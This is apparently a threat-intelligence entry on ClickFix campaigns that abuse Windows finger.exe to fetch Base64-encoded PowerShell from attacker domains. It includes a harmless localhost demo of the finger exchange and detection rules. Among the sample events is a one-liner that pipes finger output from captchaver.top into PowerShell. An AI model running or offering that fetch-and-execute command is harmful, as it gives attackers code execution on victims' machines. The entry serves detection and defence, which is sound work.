ClickFix Attacks Still Using the Finger, (Sat, Dec 13th)
AI Analysis
Technical Summary
Since November 2025, the threat actors behind the ClickFix social-engineering campaigns tracked as KongTuke and SmartApeSG have been abusing the finger protocol to deliver malicious payloads. Finger (RFC 1288) is a legacy user-information service on TCP port 79: the client connects, sends a username followed by CRLF, and the server answers with free-form text and closes the connection. The campaigns repurpose that free-form reply as a covert channel for commands and scripts hosted on attacker-controlled servers.

The chain starts with a fake CAPTCHA page that tricks the victim into running a command that invokes finger.exe, a utility that ships with Windows. finger.exe queries attacker domains such as captchaver[.]top and pmidpils[.]com, and the text they return contains Base64-encoded PowerShell commands or scripts. Those commands are then decoded and executed on the victim's machine, giving the attacker a foothold for further compromise. In a packet capture (for example in Wireshark) the activity shows up as plaintext finger traffic on TCP port 79, which is rare in a modern enterprise network and therefore easy to spot once someone looks for it.

The campaigns have been active for over a month. Because finger.exe speaks raw TCP rather than HTTP, corporate environments that force all egress through an explicit proxy, or that simply block outbound TCP port 79, break the chain; environments that let finger.exe reach the Internet remain exposed. No software vulnerability is exploited: the technique relies on user interaction plus a built-in tool and a legacy protocol that few organizations monitor or block, which lets it slip past controls focused on web traffic. Outside these campaigns the technique has not been observed widely, which points to targeted or limited activity, but its persistence and stealth warrant attention. The combination of social engineering and legacy-protocol abuse underlines the need for network monitoring that covers uncommon ports together with endpoint analysis of process behaviour.
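The exchange described above, reproduced end to end as an added example (this is not code from the diary or from any of the campaigns): a one-shot finger server on localhost returns text containing a Base64 line, and a client that behaves like finger.exe fetches the reply and recovers the encoded command. The ephemeral port instead of 79, the response layout, the harmless command string and the UTF-16LE encoding (what powershell.exe -EncodedCommand expects) are all assumptions made for the demo; nothing is executed.

```python
from __future__ import annotations

import base64
import re
import socket
import threading

# Constructed stand-in for what an attacker-controlled finger server returns.
# The diary reports Base64-encoded PowerShell in the response text; this
# example encodes a harmless command instead of anything malicious.
FAKE_COMMAND = "Write-Host 'payload would run here'"


def build_finger_response(command: str) -> bytes:
    """Wrap a command in finger-style user info, Base64-encoded as UTF-16LE.

    UTF-16LE is what powershell.exe -EncodedCommand expects; whether the real
    campaigns use that exact consumer is an assumption, not stated in the diary.
    """
    encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
    return f"Login: user\r\nPlan:\r\n{encoded}\r\n".encode("ascii")


def serve_one_query(response: bytes) -> tuple[int, threading.Thread, list[bytes]]:
    """Start a one-shot finger server on an ephemeral localhost port.

    Real servers listen on TCP 79; an ephemeral port is used here so the demo
    runs without privileges. Returns (port, thread, list receiving the query).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    received: list[bytes] = []

    def handler() -> None:
        conn, _ = srv.accept()
        with conn:
            received.append(conn.recv(1024))   # the "[user]\r\n" query line
            conn.sendall(response)             # free-form text, then close
        srv.close()

    thread = threading.Thread(target=handler, daemon=True)
    thread.start()
    return srv.getsockname()[1], thread, received


def finger_query(host: str, port: int, user: str, timeout: float = 5.0) -> str:
    """Client side of RFC 1288: send "[user]\\r\\n", read until the server closes.

    This is what `finger user@host` (finger.exe on Windows) does, which is why
    a single finger query is enough to fetch a command from the server.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{user}\r\n".encode("ascii"))
        chunks: list[bytes] = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


# A line consisting only of Base64 alphabet is the simplest heuristic for
# spotting an embedded payload in otherwise human-readable finger output.
B64_LINE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_encoded_command(text: str) -> str | None:
    """Return the first Base64 line that decodes as UTF-16LE text, else None."""
    for line in text.splitlines():
        line = line.strip()
        if not B64_LINE.fullmatch(line):
            continue
        try:
            return base64.b64decode(line, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def run_demo() -> dict[str, str | None]:
    """Full exchange: server up, client query, payload recovered from the reply."""
    port, thread, received = serve_one_query(build_finger_response(FAKE_COMMAND))
    raw = finger_query("127.0.0.1", port, "user")
    thread.join(5)
    return {
        "query_sent": received[0].decode("ascii", errors="replace"),
        "raw_response": raw,
        "decoded_command": extract_encoded_command(raw),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The point to take from the demo is how little the client side needs: six bytes on the wire and a read until EOF, which finger.exe already implements, so the attacker ships no downloader at all and the only artefacts on the host are a finger.exe process and the interpreter that consumes its output.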
Potential Impact
For European organizations the impact is unauthorized execution of malicious code leading to system compromise, data exfiltration or lateral movement. Organizations that allow outbound TCP port 79, or that keep legacy hosts around with such traffic permitted, are particularly at risk. Because the lure is a fake CAPTCHA page, users are more likely to interact with it, which makes this a credible initial access vector. A successful infection lets the attacker deploy additional malware or ransomware, disrupt operations or steal sensitive information. Using finger.exe and the finger protocol may evade detection that is tuned to HTTP/S and other common ports, increasing dwell time and complicating incident response. Industries with strict regulatory requirements, such as finance, healthcare and critical infrastructure, could face compliance violations and reputational damage if compromised. Organizations with tight egress filtering and proxy enforcement are less likely to be affected. The medium severity reflects the moderate ease of exploitation combined with potentially significant operational impact where defenses are inadequate.
Mitigation Recommendations
1. Explicitly block outbound TCP port 79 at perimeter firewalls and proxies so finger traffic cannot leave the network.
2. Disable or restrict finger.exe on Windows endpoints where it is not needed for business operations, for example with an AppLocker or WDAC rule or a per-program outbound firewall rule.
3. Implement endpoint detection rules that alert on execution of finger.exe, in particular when its output is piped into cmd.exe or PowerShell; enable PowerShell Script Block Logging so that decoded payloads are recorded.
4. Monitor network traffic for TCP port 79 activity and investigate any connection, especially to suspicious domains.
5. Educate users about social-engineering tactics, in particular fake CAPTCHA pages that ask them to run a command, to reduce the likelihood of executing malicious scripts.
6. Employ application allow-listing to prevent unauthorized execution of PowerShell scripts or other payloads delivered through this vector.
7. Use DNS filtering to block access to known malicious domains such as captchaver[.]top and pmidpils[.]com.
8. Keep endpoint security solutions updated so they detect and block encoded PowerShell payloads.
9. Conduct threat-hunting exercises focused on legacy-protocol abuse and unusual outbound connections.
10. Review and tighten proxy and egress-filtering policies so that they cover uncommon protocols such as finger.
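Recommendations 3 and 4 expressed as detection logic, added here as an example rather than taken from the diary: the rules below run over constructed Sysmon-style events and tag finger.exe execution, queries to the two domains named above, finger output piped into an interpreter, and any outbound TCP/79 connection. The event shapes, the piped command line, the IP addresses and the tag names are assumptions made for the demo.

```python
from __future__ import annotations

import re

# Domains named in the diary, with the defanging brackets removed so they
# match the form seen in raw process telemetry.
KNOWN_BAD_HOSTS = {"captchaver.top", "pmidpils.com"}

# Constructed Sysmon-style events (EventID 1 = process creation, EventID 3 =
# network connection). Not real telemetry; the piped command line is one
# plausible shape of a ClickFix one-liner, not a sample quoted by the diary.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c finger gist@captchaver.top | powershell -"},
    {"EventID": 1, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger  gist@captchaver.top"},
    {"EventID": 3, "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 79},
    {"EventID": 1, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger alice@intranet.example"},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]

# finger.exe syntax is `finger [-l] [user]@host`; capture the host part.
FINGER_CALL = re.compile(r"\bfinger(?:\.exe)?\b", re.I)
FINGER_TARGET = re.compile(
    r"\bfinger(?:\.exe)?\s+(?:-l\s+)?(?:[^\s@]*@)?(?P<host>[\w.-]+)", re.I)
# finger output handed to an interpreter is the execution step of the chain.
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:powershell|pwsh|cmd)(?:\.exe)?\b", re.I)


def classify(event: dict) -> list[str]:
    """Return the detection tags that apply to one event (empty = nothing fired)."""
    tags: list[str] = []
    if event.get("EventID") == 1:
        cmdline = event.get("CommandLine", "")
        image = event.get("Image", "").lower()
        if image.endswith("\\finger.exe") or FINGER_CALL.search(cmdline):
            tags.append("finger-execution")
            m = FINGER_TARGET.search(cmdline)
            if m and m.group("host").lower() in KNOWN_BAD_HOSTS:
                tags.append("known-bad-finger-host")
            if PIPE_TO_INTERPRETER.search(cmdline):
                tags.append("finger-output-piped-to-interpreter")
    elif event.get("EventID") == 3:
        if int(event.get("DestinationPort", 0)) == 79:
            tags.append("tcp79-egress")
    return tags


def severity(tags: list[str]) -> str:
    """High when the query targets a known host or feeds an interpreter; any
    other finger activity or TCP/79 egress is worth a look but may be legitimate."""
    if "known-bad-finger-host" in tags or "finger-output-piped-to-interpreter" in tags:
        return "high"
    return "medium" if tags else "none"


def hunt(events: list[dict]) -> list[dict]:
    """Run classify() over a batch and keep only the events that fired."""
    hits = []
    for idx, ev in enumerate(events):
        tags = classify(ev)
        if tags:
            hits.append({"index": idx, "image": ev.get("Image"),
                         "tags": tags, "severity": severity(tags)})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

In an environment where finger.exe has no business use, the "finger-execution" tag alone is enough to alert on; where it does, the pipe-to-interpreter and TCP/79 tags separate the ClickFix pattern from an administrator's occasional query. The `\bfinger` match will also fire on unrelated command lines that happen to contain the word (a path such as `C:\Users\finger\`), so pair it with the Image check in production rules.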
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Technical Details
- Article source: https://isc.sans.edu/diary/rss/32566 (fetched 2025-12-13T19:43:30.386Z, 504 words)
Threat ID: 693dc1e296904561db586efc
Added to database: 12/13/2025, 7:43:30 PM
Last enriched: 12/13/2025, 7:43:44 PM
Last updated: 12/14/2025, 4:08:56 AM